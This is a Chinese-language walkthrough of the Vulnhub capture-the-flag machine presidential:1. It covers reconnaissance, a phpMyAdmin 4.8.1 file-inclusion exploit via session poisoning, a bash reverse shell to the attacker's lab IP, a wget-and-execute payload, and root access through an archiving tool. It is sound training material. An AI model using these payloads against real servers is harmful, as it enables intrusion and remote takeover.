Vulnhub靶場presidential:1
阿新 • • 發佈:2020-08-13
0x00靶機資訊
靶機:presidential:1
難度:中-難
下載:https://www.vulnhub.com/entry/presidential-1,500/
0x01資訊收集
靶場網段:192.168.250.0/24
Nmap掃描靶場網段,尋找目標靶機IP以及相關埠以及服務
nmap -sn 192.168.250.0/24 nmap -sV -p- 192.168.250.132
IP:192.168.250.132
埠:80(http)2082(ssh)
開啟網站,果不其然也是個靜態頁面,但是頁面內有個郵箱,郵箱的域名我們本地改host繫結一下
接下來掃描目錄尋找有價值的資訊
nikto -h http://votenow.local
開啟config.php一片空白
使用dirsearch再掃下目錄看看有沒有漏掃
python3 dirsearch.py -u http://votenow.local -e php
config.php.bak同樣的一片空白,但是在原始碼內,有一些重要資訊
是資料庫的賬號密碼,但是資料庫頁面還沒見到個影,爆破一下子域名試試
wfuzz -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt -H "Host: FUZZ.votenow.local" --hw 854 --hc 400 votenow.loca
再次去host裡繫結
用config.php.bak裡的賬號密碼登入
user表有一個賬號密碼加密了,使用john解密
john --wordlist=/usr/share/wordlists/rockyou.txt --format=md5crypt john.txt
0x02漏洞利用
phpmyadmin的版本為4.8.1,這個版本有本地包含漏洞
開始利用
SQL執行
select '<?php phpinfo();exit;?>'
然後包含session
http://datasafe.votenow.local/index.php?target=db_sql.php%253f/../../../../../../../../var/lib/php/session/sess_4ribtr9diq98423tqfja79srek4ol8sj
建立反彈檔案
cd /var/www/html | echo 'bash -i >& /dev/tcp/192.168.250.129/1100 0>&1' > shell.s
再執行SQL命令
select '<?php system("wget 192.168.250.129/shell.sh; chmod +x shell.sh; bash shell.sh");exit;?>'
nc開始監聽
nc -lvv 1100
解決shell輸入字母會變成雙寫
python -c 'import pty; pty.spawn("/bin/bash")'
0x03提權
我們切換使用者到admin使用者,密碼是Stella,之前user表解密出來的
嘗試提權,sudo提權失敗,根目錄的notes.txt檔案提示的大概意思就是讓我們使用壓縮的命令
使用tars
tarS -cvf key.tar /root/.ssh/id_rsa tar -xvf key.tar cd root/.ssh ssh -i id_rsa root@localhost -p 2082
至此通關